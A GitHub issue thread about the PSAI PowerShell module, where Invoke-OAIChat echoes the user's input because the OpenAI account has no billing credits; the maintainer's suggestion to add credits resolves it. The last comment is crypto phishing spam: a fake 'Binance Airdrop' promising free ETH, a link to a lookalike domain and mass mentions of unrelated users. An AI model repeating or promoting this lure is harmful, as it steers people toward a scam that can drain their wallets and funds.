### ISSUE TITLE
Returned response to Invoke-OAIChat is always the -UserInput string

### ISSUE THREAD

**Issue by mikenelson-io** [dfinke/PSAI#5]
PSAI Module Version: 0.1.2
OpenAIKey variable set: Yes
PowerShell v7.4.2

```powershell
PS> Invoke-OAIChat 'How do I output all files in a directory PowerShell?'
How do I output all files in a directory PowerShell?
PS> $env:OpenAIKey
sk-proj-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
PS> Invoke-OAIChat 'How do I output all files in a directory PowerShell?'
How do I output all files in a directory PowerShell?
PS> Invoke-OAIChat -UserInput "What is the weather today?"
What is the weather today?
PS>
```

**Comment by dfinke** [comment]
Not sure. The key seems right. Try https://github.com/dfinke/PSAI/blob/main/examples/Simple-Tutor.ps1 

Unfortunately, works for me. 
![image](https://github.com/dfinke/PSAI/assets/67258/4c9e8de9-b5f2-4580-a004-dc2860f17ea9)

**Comment by TheITRx** [comment]
I'm having the same thing. 

It just echoes my input.

**Comment by dfinke** [comment]
@TheITRx, @mikenelson-io please check if you updated your payments to OpenAI.

You need to "deposit" money for credits. $5 should last a long while.

Others had this issue and unfortunately the server does not throw an error that the account billing needs to be updated.

**Comment by TheITRx** [comment]
Put in some $s and its working. thanks!

**Comment by fluxionkr** [comment]
# Binance Airdrop: Get 1 Eth for Free!

Are you a cryptocurrency enthusiast looking to score some free Eth? Look no further, because Binance is giving away 1 Eth to its lucky users through an exciting airdrop campaign.

To participate in this airdrop, simply click on the link below and follow the instructions provided. Don't miss out on this golden opportunity to boost your crypto holdings!

[Click here to claim your free Eth now](https://app.bnbinchain.com/en/bnb-staking) 

Hurry, this offer won't last long! Join the likes of gulewei, @leolianger, @happyyb, @rukku, @gottfriedsz, @cnxh, @Tzal3x, @knxyzkn, @sharelinux, @rajib-raiyat and many others who have already claimed their free Eth.
